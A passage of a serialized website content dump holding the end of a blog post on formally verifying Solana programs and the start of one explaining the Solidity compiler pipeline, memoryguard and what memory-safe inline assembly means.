runtime\n",{"type":26,"tag":137,"props":31306,"children":31307},{"class":5559,"line":5939},[31308,31312,31316,31320,31324,31328,31332,31336],{"type":26,"tag":137,"props":31309,"children":31310},{"style":5682},[31311],{"type":32,"value":21833},{"type":26,"tag":137,"props":31313,"children":31314},{"style":5601},[31315],{"type":32,"value":165},{"type":26,"tag":137,"props":31317,"children":31318},{"style":5584},[31319],{"type":32,"value":22874},{"type":26,"tag":137,"props":31321,"children":31322},{"style":5590},[31323],{"type":32,"value":470},{"type":26,"tag":137,"props":31325,"children":31326},{"style":5601},[31327],{"type":32,"value":31027},{"type":26,"tag":137,"props":31329,"children":31330},{"style":5590},[31331],{"type":32,"value":470},{"type":26,"tag":137,"props":31333,"children":31334},{"style":5682},[31335],{"type":32,"value":24358},{"type":26,"tag":137,"props":31337,"children":31338},{"style":5601},[31339],{"type":32,"value":18016},{"type":26,"tag":137,"props":31341,"children":31342},{"class":5559,"line":6191},[31343],{"type":26,"tag":137,"props":31344,"children":31345},{"emptyLinePlaceholder":18},[31346],{"type":32,"value":6276},{"type":26,"tag":137,"props":31348,"children":31349},{"class":5559,"line":6208},[31350,31354],{"type":26,"tag":137,"props":31351,"children":31352},{"style":6009},[31353],{"type":32,"value":16924},{"type":26,"tag":137,"props":31355,"children":31356},{"style":5601},[31357],{"type":32,"value":16929},{"type":26,"tag":137,"props":31359,"children":31360},{"class":5559,"line":6225},[31361],{"type":26,"tag":137,"props":31362,"children":31363},{"style":5601},[31364],{"type":32,"value":6507},{"type":26,"tag":35,"props":31366,"children":31367},{},[31368,31370,31375,31377,31382,31384,31389],{"type":32,"value":31369},"Here, we explicitly ",{"type":26,"tag":130,"props":31371,"children":31373},{"className":31372},[],[31374],{"type":32,"value":22577},{"type":32,"value":31376}," that our invariants hold at ",{"type":26,"tag":762,"props":31378,"children":31379},{},[31380],{"type":32,"value":31381},"runtime",{"type":32,"value":31383}," which allows us to be assured that ",{"type":26,"tag":130,"props":31385,"children":31387},{"className":31386},[],[31388],{"type":32,"value":31027},{"type":32,"value":31390}," will not enter a bad state as a result of some unverifiable behavior.",{"type":26,"tag":35,"props":31392,"children":31393},{},[31394],{"type":32,"value":31395},"In general techniques like this can be used to tidy up the loose ends that formal verification may struggle with.",{"type":26,"tag":92,"props":31397,"children":31399},{"id":31398},"challenges-of-formal-verification-on-solana",[31400],{"type":32,"value":31401},"Challenges of formal verification on Solana",{"type":26,"tag":118,"props":31403,"children":31405},{"id":31404},"expensive-computation",[31406],{"type":32,"value":31407},"Expensive computation",{"type":26,"tag":35,"props":31409,"children":31410},{},[31411,31413,31418],{"type":32,"value":31412},"As we started exploring this project, we were hoping to see it work straight out of the box. Unfortunately, that was not the case. Harkening back to our friend ",{"type":26,"tag":762,"props":31414,"children":31415},{},[31416],{"type":32,"value":31417},"path explosion",{"type":32,"value":31419},", it is often the case that bounded model checking just grinds and grinds on the problem and is not able to produce a solution.",{"type":26,"tag":35,"props":31421,"children":31422},{},[31423,31425,31430],{"type":32,"value":31424},"In order to make this technique more widely applicable, we've been developing a runtime SDK layer that is more ",{"type":26,"tag":762,"props":31426,"children":31427},{},[31428],{"type":32,"value":31429},"formal verification friendly",{"type":32,"value":31431},". Specifically our tool will replace certain built-in SDK functions and structures with less expensive ones in the context of symbolic execution.",{"type":26,"tag":35,"props":31433,"children":31434},{},[31435,31437,31442,31444,31449],{"type":32,"value":31436},"For example, when verifying things like the uniqueness of a ",{"type":26,"tag":130,"props":31438,"children":31440},{"className":31439},[],[31441],{"type":32,"value":23991},{"type":32,"value":31443}," in a ",{"type":26,"tag":130,"props":31445,"children":31447},{"className":31446},[],[31448],{"type":32,"value":19804},{"type":32,"value":31450},", the native program may generate extremely large SMT expressions containing nested 32-byte comparisons and binary searches on a vector.",{"type":26,"tag":35,"props":31452,"children":31453},{},[31454,31456,31461,31463,31468,31470,31475,31477,31482,31484,31489,31491,31496],{"type":32,"value":31455},"However, in most cases the properties we are interested in do not require specific search algorithms for the ",{"type":26,"tag":130,"props":31457,"children":31459},{"className":31458},[],[31460],{"type":32,"value":19804},{"type":32,"value":31462}," or a 32-byte ",{"type":26,"tag":130,"props":31464,"children":31466},{"className":31465},[],[31467],{"type":32,"value":23991},{"type":32,"value":31469},". Instead, our tool can substitute in ",{"type":26,"tag":762,"props":31471,"children":31472},{},[31473],{"type":32,"value":31474},"cheaper",{"type":32,"value":31476}," types and functions, such as a 4-byte ",{"type":26,"tag":130,"props":31478,"children":31480},{"className":31479},[],[31481],{"type":32,"value":23991},{"type":32,"value":31483}," struct and a fixed-size, array-backed ",{"type":26,"tag":130,"props":31485,"children":31487},{"className":31486},[],[31488],{"type":32,"value":19804},{"type":32,"value":31490}," implementation. These structures are API-compatible with the native SDK and the changes are functionally invisible to the Solana program we are verifying. However, the generated expressions are ",{"type":26,"tag":762,"props":31492,"children":31493},{},[31494],{"type":32,"value":31495},"much",{"type":32,"value":31497}," simpler and we find that these techniques can greatly accelerate the speed of model-checking.",{"type":26,"tag":35,"props":31499,"children":31500},{},[31501],{"type":32,"value":31502},"It is of key importance that these SDK modifications do not introduce any unsoundness into the model-checking process. We are actively exploring how to do this effectively.",{"type":26,"tag":118,"props":31504,"children":31506},{"id":31505},"runtime-environment",[31507],{"type":32,"value":31508},"Runtime Environment",{"type":26,"tag":35,"props":31510,"children":31511},{},[31512],{"type":32,"value":31513},"While these techniques are quite capable of verifying pure-Rust constructs such as the logical flow of the program, use of Rust types, etc... other aspects of the Solana runtime environment are more difficult to verify.",{"type":26,"tag":35,"props":31515,"children":31516},{},[31517],{"type":32,"value":31518},"For example, a program may resize accounts to store variable amounts of data. These types of custom serialization algorithms require specialized techniques to verify account invariants. For example, a bug with account serialization could undermine \"correct\" account logic.",{"type":26,"tag":35,"props":31520,"children":31521},{},[31522],{"type":32,"value":31523},"Another example is cross-program invocation (CPI). While account data cannot be changed by other programs, when you invoke other instructions it becomes more difficult to verify instruction invariants. An instruction three levels down could fail and cause the whole transaction to revert.",{"type":26,"tag":92,"props":31525,"children":31527},{"id":31526},"conclusion",[31528],{"type":32,"value":21540},{"type":26,"tag":35,"props":31530,"children":31531},{},[31532],{"type":32,"value":31533},"Computer security is far from being a solved problem. Formal verification is a great technique but it is not a magic bullet. While it can help you verify the correctness of your program it won't catch 100% of the bugs. It won't stop you from specifying the wrong invariants or forgetting things, and it can't help you if there is a bug outside of the scope of the model — for example in the runtime or consensus layer.",{"type":26,"tag":35,"props":31535,"children":31536},{},[31537],{"type":32,"value":31538},"Disclaimer out of the way, we believe that formal verification can still be a very useful tool when applied correctly. We've demonstrated that it is possible to automatically prove invariants about Solana programs in a tractable and user-friendly way.",{"type":26,"tag":3265,"props":31540,"children":31541},{},[],{"type":26,"tag":35,"props":31543,"children":31544},{},[31545],{"type":26,"tag":762,"props":31546,"children":31547},{},[31548,31550,31555,31556,31560],{"type":32,"value":31549},"We're excited to keep pushing this research forward and enhance the security of the whole Solana ecosystem. Our tools are still in development but we're interested in working with other teams. If you have a Solana program you want to get formally verified, give us a shout! Fill out ",{"type":26,"tag":41,"props":31551,"children":31553},{"href":21468,"rel":31552},[45],[31554],{"type":32,"value":21472},{"type":32,"value":21474},{"type":26,"tag":41,"props":31557,"children":31558},{"href":21477},[31559],{"type":32,"value":21480},{"type":32,"value":470},{"type":26,"tag":7949,"props":31562,"children":31563},{},[31564],{"type":32,"value":7953},{"title":7,"searchDepth":5412,"depth":5412,"links":31566},[31567,31573,31577,31582,31588,31592],{"id":21543,"depth":5412,"text":21546,"children":31568},[31569,31570,31571,31572],{"id":21549,"depth":5417,"text":21552},{"id":21617,"depth":5417,"text":21620},{"id":22497,"depth":5417,"text":22500},{"id":22537,"depth":5417,"text":22540},{"id":22590,"depth":5412,"text":31574,"children":31575},"Specification: How can we describe what we want our program to do?",[31576],{"id":22704,"depth":5417,"text":22707},{"id":24063,"depth":5412,"text":24066,"children":31578},[31579,31580,31581],{"id":24726,"depth":5417,"text":24729},{"id":25011,"depth":5417,"text":25014},{"id":25155,"depth":5417,"text":25158},{"id":25296,"depth":5412,"text":25299,"children":31583},[31584,31585,31586,31587],{"id":25367,"depth":5417,"text":25370},{"id":27230,"depth":5417,"text":27233},{"id":28032,"depth":5417,"text":25359},{"id":30558,"depth":5417,"text":25364},{"id":31398,"depth":5412,"text":31401,"children":31589},[31590,31591],{"id":31404,"depth":5417,"text":31407},{"id":31505,"depth":5417,"text":31508},{"id":31526,"depth":5412,"text":21540},"content:blog:2023-01-26-formally-verifying-solana-programs.md","blog/2023-01-26-formally-verifying-solana-programs.md","blog/2023-01-26-formally-verifying-solana-programs",{"_path":31597,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":31598,"description":31599,"author":8304,"image":31600,"date":31602,"isFeatured":18,"onBlogPage":18,"tags":31603,"body":31605,"_type":5433,"_id":33024,"_source":5435,"_file":33025,"_stem":33026,"_extension":5438},"/blog/2023-07-28-solidity-compilers-memory-safety","Solidity Compilers: Memory Safety","An exploration into the Solidity compilation pipeline, optimization assumptions, and how it all relates back to memory-safe assembly.",{"src":31601,"height":17,"width":17},"/posts/solidity-compilers-memory-safety/header.jpg","2023-07-28",[7054,31604],"compiler",{"type":23,"children":31606,"toc":33015},[31607,31613,31649,31661,31667,31689,31702,31850,31871,31876,31897,31902,31910,31915,31920,31925,31931,31950,31955,31976,32038,32051,32081,32101,32128,32133,32146,32151,32156,32169,32200,32223,32377,32395,32446,32465,32490,32495,32501,32528,32548,32576,32581,32603,32622,32630,32641,32646,32662,32919,32927,32932,32936,32941,32946,33011],{"type":26,"tag":92,"props":31608,"children":31610},{"id":31609},"introduction",[31611],{"type":32,"value":31612},"Introduction",{"type":26,"tag":35,"props":31614,"children":31615},{},[31616,31618,31624,31625,31629,31631,31638,31640,31647],{"type":32,"value":31617},"What does ",{"type":26,"tag":130,"props":31619,"children":31621},{"className":31620},[],[31622],{"type":32,"value":31623},"memory-safe",{"type":32,"value":1011},{"type":26,"tag":762,"props":31626,"children":31627},{},[31628],{"type":32,"value":11877},{"type":32,"value":31630}," mean? What guarantees does Solidity expose when you're dealing with inline assembly? The documentation ",{"type":26,"tag":41,"props":31632,"children":31635},{"href":31633,"rel":31634},"https://docs.soliditylang.org/en/v0.8.20/assembly.html#memory-safety",[45],[31636],{"type":32,"value":31637},"presents some requirements",{"type":32,"value":31639},", but is production code that ",{"type":26,"tag":41,"props":31641,"children":31644},{"href":31642,"rel":31643},"https://github.com/Vectorized/solady/blob/main/src/utils/SafeTransferLib.sol#L165-L166",[45],[31645],{"type":32,"value":31646},"violates these requirements",{"type":32,"value":31648}," necessarily unsafe?",{"type":26,"tag":35,"props":31650,"children":31651},{},[31652,31654,31659],{"type":32,"value":31653},"In this blog post, we present a high-level overview of the Solidity compiler. We'll also dive into the optimization pipeline, language lawyering, and present an argument for what ",{"type":26,"tag":762,"props":31655,"children":31656},{},[31657],{"type":32,"value":31658},"memory-safety",{"type":32,"value":31660}," actually means.",{"type":26,"tag":92,"props":31662,"children":31664},{"id":31663},"compiler-pipeline",[31665],{"type":32,"value":31666},"Compiler Pipeline",{"type":26,"tag":35,"props":31668,"children":31669},{},[31670,31672,31679,31681,31688],{"type":32,"value":31671},"For brevity's sake, we'll only cover the YUL IR Solidity compilation pipeline ",{"type":26,"tag":41,"props":31673,"children":31676},{"href":31674,"rel":31675},"https://blog.soliditylang.org/2022/03/16/solidity-0.8.13-release-announcement/",[45],[31677],{"type":32,"value":31678},"released in v0.8.13",{"type":32,"value":31680},". Compilation happens ",{"type":26,"tag":41,"props":31682,"children":31685},{"href":31683,"rel":31684},"https://github.com/ethereum/solidity/blob/4a8d6618f5b398077f694835905f93d0a3890289/libsolidity/interface/CompilerStack.cpp#L684",[45],[31686],{"type":32,"value":31687},"in two main steps",{"type":32,"value":7072},{"type":26,"tag":4820,"props":31690,"children":31691},{},[31692,31697],{"type":26,"tag":3430,"props":31693,"children":31694},{},[31695],{"type":32,"value":31696},"Solidity to YUL IR",{"type":26,"tag":3430,"props":31698,"children":31699},{},[31700],{"type":32,"value":31701},"YUL IR to EVM opcodes",{"type":26,"tag":5512,"props":31703,"children":31707},{"className":31704,"code":31705,"language":31706,"meta":7,"style":7},"language-cpp shiki shiki-themes slack-dark","    if (m_viaIR || m_generateIR || m_generateEwasm)\n        generateIR(*contract);\n    if (m_generateEvmBytecode)\n    {\n        if (m_viaIR)\n            generateEVMFromIR(*contract);\n        else\n            compileContract(*contract, otherCompilers);\n    }\n","cpp",[31708],{"type":26,"tag":130,"props":31709,"children":31710},{"__ignoreMap":7},[31711,31741,31762,31774,31782,31794,31814,31822,31843],{"type":26,"tag":137,"props":31712,"children":31713},{"class":5559,"line":5560},[31714,31718,31723,31727,31732,31736],{"type":26,"tag":137,"props":31715,"children":31716},{"style":5610},[31717],{"type":32,"value":14870},{"type":26,"tag":137,"props":31719,"children":31720},{"style":5601},[31721],{"type":32,"value":31722}," (m_viaIR ",{"type":26,"tag":137,"props":31724,"children":31725},{"style":5590},[31726],{"type":32,"value":24998},{"type":26,"tag":137,"props":31728,"children":31729},{"style":5601},[31730],{"type":32,"value":31731}," m_generateIR ",{"type":26,"tag":137,"props":31733,"children":31734},{"style":5590},[31735],{"type":32,"value":24998},{"type":26,"tag":137,"props":31737,"children":31738},{"style":5601},[31739],{"type":32,"value":31740}," m_generateEwasm)\n",{"type":26,"tag":137,"props":31742,"children":31743},{"class":5559,"line":5412},[31744,31749,31753,31757],{"type":26,"tag":137,"props":31745,"children":31746},{"style":5682},[31747],{"type":32,"value":31748},"        generateIR",{"type":26,"tag":137,"props":31750,"children":31751},{"style":5601},[31752],{"type":32,"value":165},{"type":26,"tag":137,"props":31754,"children":31755},{"style":5590},[31756],{"type":32,"value":7152},{"type":26,"tag":137,"props":31758,"children":31759},{"style":5601},[31760],{"type":32,"value":31761},"contract);\n",{"type":26,"tag":137,"props":31763,"children":31764},{"class":5559,"line":5417},[31765,31769],{"type":26,"tag":137,"props":31766,"children":31767},{"style":5610},[31768],{"type":32,"value":14870},{"type":26,"tag":137,"props":31770,"children":31771},{"style":5601},[31772],{"type":32,"value":31773}," (m_generateEvmBytecode)\n",{"type":26,"tag":137,"props":31775,"children":31776},{"class":5559,"line":5642},[31777],{"type":26,"tag":137,"props":31778,"children":31779},{"style":5601},[31780],{"type":32,"value":31781},"    {\n",{"type":26,"tag":137,"props":31783,"children":31784},{"class":5559,"line":5745},[31785,31789],{"type":26,"tag":137,"props":31786,"children":31787},{"style":5610},[31788],{"type":32,"value":5856},{"type":26,"tag":137,"props":31790,"children":31791},{"style":5601},[31792],{"type":32,"value":31793}," (m_viaIR)\n",{"type":26,"tag":137,"props":31795,"children":31796},{"class":5559,"line":5850},[31797,31802,31806,31810],{"type":26,"tag":137,"props":31798,"children":31799},{"style":5682},[31800],{"type":32,"value":31801},"            generateEVMFromIR",{"type":26,"tag":137,"props":31803,"children":31804},{"style":5601},[31805],{"type":32,"value":165},{"type":26,"tag":137,"props":31807,"children":31808},{"style":5590},[31809],{"type":32,"value":7152},{"type":26,"tag":137,"props":31811,"children":31812},{"style":5601},[31813],{"type":32,"value":31761},{"type":26,"tag":137,"props":31815,"children":31816},{"class":5559,"line":5878},[31817],{"type":26,"tag":137,"props":31818,"children":31819},{"style":5610},[31820],{"type":32,"value":31821},"        else\n",{"type":26,"tag":137,"props":31823,"children":31824},{"class":5559,"line":5891},[31825,31830,31834,31838],{"type":26,"tag":137,"props":31826,"children":31827},{"style":5682},[31828],{"type":32,"value":31829},"            compileContract",{"type":26,"tag":137,"props":31831,"children":31832},{"style":5601},[31833],{"type":32,"value":165},{"type":26,"tag":137,"props":31835,"children":31836},{"style":5590},[31837],{"type":32,"value":7152},{"type":26,"tag":137,"props":31839,"children":31840},{"style":5601},[31841],{"type":32,"value":31842},"contract, otherCompilers);\n",{"type":26,"tag":137,"props":31844,"children":31845},{"class":5559,"line":5909},[31846],{"type":26,"tag":137,"props":31847,"children":31848},{"style":5601},[31849],{"type":32,"value":5945},{"type":26,"tag":35,"props":31851,"children":31852},{},[31853,31855,31862,31863,31870],{"type":32,"value":31854},"Each step applies its own set of optimizations. The entrypoints are located at ",{"type":26,"tag":41,"props":31856,"children":31859},{"href":31857,"rel":31858},"https://github.com/ethereum/solidity/blob/fd9ac9abed2049a4b8134d39e178275c8aad75b6/libyul/YulStack.cpp#L92",[45],[31860],{"type":32,"value":31861},"YulStack::optimize",{"type":32,"value":3339},{"type":26,"tag":41,"props":31864,"children":31867},{"href":31865,"rel":31866},"https://github.com/ethereum/solidity/blob/4a8d6618f5b398077f694835905f93d0a3890289/libevmasm/Assembly.cpp#L336",[45],[31868],{"type":32,"value":31869},"Assembly::optimize",{"type":32,"value":470},{"type":26,"tag":35,"props":31872,"children":31873},{},[31874],{"type":32,"value":31875},"In total, there are four steps.",{"type":26,"tag":4820,"props":31877,"children":31878},{},[31879,31883,31888,31892],{"type":26,"tag":3430,"props":31880,"children":31881},{},[31882],{"type":32,"value":31696},{"type":26,"tag":3430,"props":31884,"children":31885},{},[31886],{"type":32,"value":31887},"Optimization of YUL IR",{"type":26,"tag":3430,"props":31889,"children":31890},{},[31891],{"type":32,"value":31701},{"type":26,"tag":3430,"props":31893,"children":31894},{},[31895],{"type":32,"value":31896},"Optimization of EVM opcodes",{"type":26,"tag":35,"props":31898,"children":31899},{},[31900],{"type":32,"value":31901},"As mentioned in the v0.8.13 release post, the YUL optimizer is able to perform much more complex optimizations. Compared to Solidity, YUL contains detailed semantic information and is simpler for optimization passes to reason about than opcodes.",{"type":26,"tag":5503,"props":31903,"children":31904},{},[31905],{"type":26,"tag":35,"props":31906,"children":31907},{},[31908],{"type":32,"value":31909},"The performance of the new pipeline is not yet always superior to the old one, but it can do much higher-level optimization across functions, so please try it out and give us feedback!",{"type":26,"tag":35,"props":31911,"children":31912},{},[31913],{"type":32,"value":31914},"Importantly, each step happens in isolation and retains no information about the previous stage.",{"type":26,"tag":35,"props":31916,"children":31917},{},[31918],{"type":32,"value":31919},"The optimizer cannot change the behavior of the generated IR. This means we don't need to worry about potentially tricky optimizations such as reordering of functions, removal of unused assigns, or moving stack variables to memory.",{"type":26,"tag":35,"props":31921,"children":31922},{},[31923],{"type":32,"value":31924},"When it comes to safety, we need only to consider the IR generation. But what exactly are the guarantees here?",{"type":26,"tag":92,"props":31926,"children":31928},{"id":31927},"guarantees",[31929],{"type":32,"value":31930},"Guarantees",{"type":26,"tag":35,"props":31932,"children":31933},{},[31934,31935,31942,31944,31949],{"type":32,"value":19206},{"type":26,"tag":41,"props":31936,"children":31939},{"href":31937,"rel":31938},"https://docs.soliditylang.org/en/v0.8.20/internals/layout_in_memory.html",[45],[31940],{"type":32,"value":31941},"Solidity memory layout",{"type":32,"value":31943}," exists only at the time of YUL IR generation. The YUL optimizer and later steps has ",{"type":26,"tag":762,"props":31945,"children":31946},{},[31947],{"type":32,"value":31948},"no information about this layout",{"type":32,"value":470},{"type":26,"tag":35,"props":31951,"children":31952},{},[31953],{"type":32,"value":31954},"What if the optimizer wants to use memory for optimization passes? How does it know what slots are used by the IR generator?",{"type":26,"tag":35,"props":31956,"children":31957},{},[31958,31960,31966,31968,31974],{"type":32,"value":31959},"Introducing ",{"type":26,"tag":130,"props":31961,"children":31963},{"className":31962},[],[31964],{"type":32,"value":31965},"memoryguard",{"type":32,"value":31967},". If you've ever looked at the output of ",{"type":26,"tag":130,"props":31969,"children":31971},{"className":31970},[],[31972],{"type":32,"value":31973},"solc --ir",{"type":32,"value":31975},", this call may be familiar. It's used to initialize the free-memory pointer.",{"type":26,"tag":5512,"props":31977,"children":31979},{"className":7055,"code":31978,"language":7054,"meta":7,"style":7},"    /// @src 0:26:371  \"contract XXX {...\"\n    store(64, memoryguard(0x80))\n",[31980],{"type":26,"tag":130,"props":31981,"children":31982},{"__ignoreMap":7},[31983,32001],{"type":26,"tag":137,"props":31984,"children":31985},{"class":5559,"line":5560},[31986,31991,31996],{"type":26,"tag":137,"props":31987,"children":31988},{"style":5564},[31989],{"type":32,"value":31990},"    /// @src 0:26:371  \"contract ",{"type":26,"tag":137,"props":31992,"children":31993},{"style":5573},[31994],{"type":32,"value":31995},"XXX",{"type":26,"tag":137,"props":31997,"children":31998},{"style":5564},[31999],{"type":32,"value":32000}," {...\"\n",{"type":26,"tag":137,"props":32002,"children":32003},{"class":5559,"line":5412},[32004,32009,32013,32017,32021,32025,32029,32034],{"type":26,"tag":137,"props":32005,"children":32006},{"style":5682},[32007],{"type":32,"value":32008},"    store",{"type":26,"tag":137,"props":32010,"children":32011},{"style":5601},[32012],{"type":32,"value":165},{"type":26,"tag":137,"props":32014,"children":32015},{"style":5626},[32016],{"type":32,"value":3957},{"type":26,"tag":137,"props":32018,"children":32019},{"style":5601},[32020],{"type":32,"value":1108},{"type":26,"tag":137,"props":32022,"children":32023},{"style":5682},[32024],{"type":32,"value":31965},{"type":26,"tag":137,"props":32026,"children":32027},{"style":5601},[32028],{"type":32,"value":165},{"type":26,"tag":137,"props":32030,"children":32031},{"style":5626},[32032],{"type":32,"value":32033},"0x80",{"type":26,"tag":137,"props":32035,"children":32036},{"style":5601},[32037],{"type":32,"value":22305},{"type":26,"tag":35,"props":32039,"children":32040},{},[32041,32043,32050],{"type":32,"value":32042},"From ",{"type":26,"tag":41,"props":32044,"children":32047},{"href":32045,"rel":32046},"https://solidity.readthedocs.io/en/latest/yul.html#memoryguard",[45],[32048],{"type":32,"value":32049},"the documentation",{"type":32,"value":180},{"type":26,"tag":5503,"props":32052,"children":32053},{},[32054],{"type":26,"tag":35,"props":32055,"children":32056},{},[32057,32059,32065,32067,32073,32075,32080],{"type":32,"value":32058},"The caller of ",{"type":26,"tag":130,"props":32060,"children":32062},{"className":32061},[],[32063],{"type":32,"value":32064},"let ptr := memoryguard(size)",{"type":32,"value":32066}," (where size has to be a literal number) promises that they only use memory in either the range ",{"type":26,"tag":130,"props":32068,"children":32070},{"className":32069},[],[32071],{"type":32,"value":32072},"[0, size)",{"type":32,"value":32074}," or the unbounded range starting at ",{"type":26,"tag":130,"props":32076,"children":32078},{"className":32077},[],[32079],{"type":32,"value":16540},{"type":32,"value":470},{"type":26,"tag":35,"props":32082,"children":32083},{},[32084,32086,32091,32093,32099],{"type":32,"value":32085},"For example, if the YUL optimizer needs 32 bytes of memory, it can have ",{"type":26,"tag":130,"props":32087,"children":32089},{"className":32088},[],[32090],{"type":32,"value":31965},{"type":32,"value":32092}," return ",{"type":26,"tag":130,"props":32094,"children":32096},{"className":32095},[],[32097],{"type":32,"value":32098},"size + 32",{"type":32,"value":32100},". The optimizer gets a guaranteed region of memory which will not be touched!",{"type":26,"tag":35,"props":32102,"children":32103},{},[32104,32106,32113,32115,32120,32122,32127],{"type":32,"value":32105},"An example of this optimization in practice ",{"type":26,"tag":41,"props":32107,"children":32110},{"href":32108,"rel":32109},"https://github.com/ethereum/solidity/blob/1633e367c90aed7a6a14d84e2c288e6a8ab93304/libyul/optimiser/StackLimitEvader.cpp",[45],[32111],{"type":32,"value":32112},"is the StackLimitEvader",{"type":32,"value":32114},", which moves variables from the stack into memory. Incidentally, this is also currently the ",{"type":26,"tag":762,"props":32116,"children":32117},{},[32118],{"type":32,"value":32119},"only",{"type":32,"value":32121}," optimization pass that relies on the semantic information communicated by ",{"type":26,"tag":130,"props":32123,"children":32125},{"className":32124},[],[32126],{"type":32,"value":31965},{"type":32,"value":470},{"type":26,"tag":35,"props":32129,"children":32130},{},[32131],{"type":32,"value":32132},"The modular design between different compiler stages also means that we're not tied down into any particular memory layout. Does it make sense to waste an entire memory word on the free memory pointer? Maybe not for some applications.",{"type":26,"tag":35,"props":32134,"children":32135},{},[32136,32138,32144],{"type":32,"value":32137},"Fear not, for we can remove this pointer entirely and call ",{"type":26,"tag":130,"props":32139,"children":32141},{"className":32140},[],[32142],{"type":32,"value":32143},"memoryguard(0x60)",{"type":32,"value":32145}," instead. The rest of the pipeline will still work.",{"type":26,"tag":92,"props":32147,"children":32148},{"id":31658},[32149],{"type":32,"value":32150},"Memory Safety",{"type":26,"tag":35,"props":32152,"children":32153},{},[32154],{"type":32,"value":32155},"So what does memory safety mean?",{"type":26,"tag":35,"props":32157,"children":32158},{},[32159,32161,32167],{"type":32,"value":32160},"The Solidity documentation provides ",{"type":26,"tag":41,"props":32162,"children":32164},{"href":31633,"rel":32163},[45],[32165],{"type":32,"value":32166},"a set of constraints",{"type":32,"value":32168},", not a definition.",{"type":26,"tag":5503,"props":32170,"children":32171},{},[32172,32177],{"type":26,"tag":35,"props":32173,"children":32174},{},[32175],{"type":32,"value":32176},"In particular, a memory-safe assembly block may only access the following memory ranges:",{"type":26,"tag":4820,"props":32178,"children":32179},{},[32180,32185,32190,32195],{"type":26,"tag":3430,"props":32181,"children":32182},{},[32183],{"type":32,"value":32184},"Memory allocated by yourself using a mechanism like the allocate function described above.",{"type":26,"tag":3430,"props":32186,"children":32187},{},[32188],{"type":32,"value":32189},"Memory allocated by Solidity, e.g. memory within the bounds of a memory array you reference.",{"type":26,"tag":3430,"props":32191,"children":32192},{},[32193],{"type":32,"value":32194},"The scratch space between memory offset 0 and 64 mentioned above.",{"type":26,"tag":3430,"props":32196,"children":32197},{},[32198],{"type":32,"value":32199},"Temporary memory that is located after the value of the free memory pointer at the beginning of the assembly\nblock, i.e. memory that is “allocated” at the free memory pointer without updating the free memory pointer.",{"type":26,"tag":35,"props":32201,"children":32202},{},[32203,32205,32212,32222],{"type":32,"value":32204},"Looking to the compiler, it appears the presence of memory-unsafe assembly ",{"type":26,"tag":41,"props":32206,"children":32209},{"href":32207,"rel":32208},"https://github.com/ethereum/solidity/blob/a297a687261a1c634551b1dac0e36d4573c19afe/libsolidity/codegen/ir/IRGenerator.cpp#L210",[45],[32210],{"type":32,"value":32211},"removes the memory guard",{"type":26,"tag":18065,"props":32213,"children":32214},{},[32215],{"type":26,"tag":41,"props":32216,"children":32220},{"href":32217,"ariaDescribedBy":32218,"dataFootnoteRef":7,"id":32219},"#user-content-fn-1",[18072],"user-content-fnref-1",[32221],{"type":32,"value":878},{"type":32,"value":470},{"type":26,"tag":5512,"props":32224,"children":32226},{"className":31704,"code":32225,"language":31706,"meta":7,"style":7},"// bool creationInvolvesMemoryUnsafeAssembly = m_context.memoryUnsafeInlineAssemblySeen();\n// t(\"memoryInitCreation\", memoryInit(!creationInvolvesMemoryUnsafeAssembly));\n\nstring IRGenerator::memoryInit(bool _useMemoryGuard)\n{\n // This function should be called at the beginning of the EVM call frame\n // and thus can assume all memory to be zero, including the contents of\n // the \"zero memory area\" (the position CompilerUtils::zeroPointer points to).\n return\n  Whiskers{\n   _useMemoryGuard ?\n   \"mstore(\u003CmemPtr>, memoryguard(\u003CfreeMemoryStart>))\" :\n   \"mstore(\u003CmemPtr>, \u003CfreeMemoryStart>)\"\n  }\n",[32227],{"type":26,"tag":130,"props":32228,"children":32229},{"__ignoreMap":7},[32230,32238,32246,32253,32289,32296,32304,32312,32320,32328,32336,32349,32362,32370],{"type":26,"tag":137,"props":32231,"children":32232},{"class":5559,"line":5560},[32233],{"type":26,"tag":137,"props":32234,"children":32235},{"style":5564},[32236],{"type":32,"value":32237},"// bool creationInvolvesMemoryUnsafeAssembly = m_context.memoryUnsafeInlineAssemblySeen();\n",{"type":26,"tag":137,"props":32239,"children":32240},{"class":5559,"line":5412},[32241],{"type":26,"tag":137,"props":32242,"children":32243},{"style":5564},[32244],{"type":32,"value":32245},"// t(\"memoryInitCreation\", memoryInit(!creationInvolvesMemoryUnsafeAssembly));\n",{"type":26,"tag":137,"props":32247,"children":32248},{"class":5559,"line":5417},[32249],{"type":26,"tag":137,"props":32250,"children":32251},{"emptyLinePlaceholder":18},[32252],{"type":32,"value":6276},{"type":26,"tag":137,"props":32254,"children":32255},{"class":5559,"line":5642},[32256,32261,32266,32271,32275,32280,32285],{"type":26,"tag":137,"props":32257,"children":32258},{"style":6009},[32259],{"type":32,"value":32260},"string",{"type":26,"tag":137,"props":32262,"children":32263},{"style":5601},[32264],{"type":32,"value":32265}," IRGenerator::",{"type":26,"tag":137,"props":32267,"children":32268},{"style":5682},[32269],{"type":32,"value":32270},"memoryInit",{"type":26,"tag":137,"props":32272,"children":32273},{"style":5601},[32274],{"type":32,"value":165},{"type":26,"tag":137,"props":32276,"children":32277},{"style":5573},[32278],{"type":32,"value":32279},"bool",{"type":26,"tag":137,"props":32281,"children":32282},{"style":5584},[32283],{"type":32,"value":32284}," _useMemoryGuard",{"type":26,"tag":137,"props":32286,"children":32287},{"style":5601},[32288],{"type":32,"value":5742},{"type":26,"tag":137,"props":32290,"children":32291},{"class":5559,"line":5745},[32292],{"type":26,"tag":137,"props":32293,"children":32294},{"style":5601},[32295],{"type":32,"value":13471},{"type":26,"tag":137,"props":32297,"children":32298},{"class":5559,"line":5850},[32299],{"type":26,"tag":137,"props":32300,"children":32301},{"style":5564},[32302],{"type":32,"value":32303}," // This function should be called at the beginning of the EVM call frame\n",{"type":26,"tag":137,"props":32305,"children":32306},{"class":5559,"line":5878},[32307],{"type":26,"tag":137,"props":32308,"children":32309},{"style":5564},[32310],{"type":32,"value":32311}," // and thus can assume all memory to be zero, including the contents of\n",{"type":26,"tag":137,"props":32313,"children":32314},{"class":5559,"line":5891},[32315],{"type":26,"tag":137,"props":32316,"children":32317},{"style":5564},[32318],{"type":32,"value":32319}," // the \"zero memory area\" (the position CompilerUtils::zeroPointer points to).\n",{"type":26,"tag":137,"props":32321,"children":32322},{"class":5559,"line":5909},[32323],{"type":26,"tag":137,"props":32324,"children":32325},{"style":5610},[32326],{"type":32,"value":32327}," 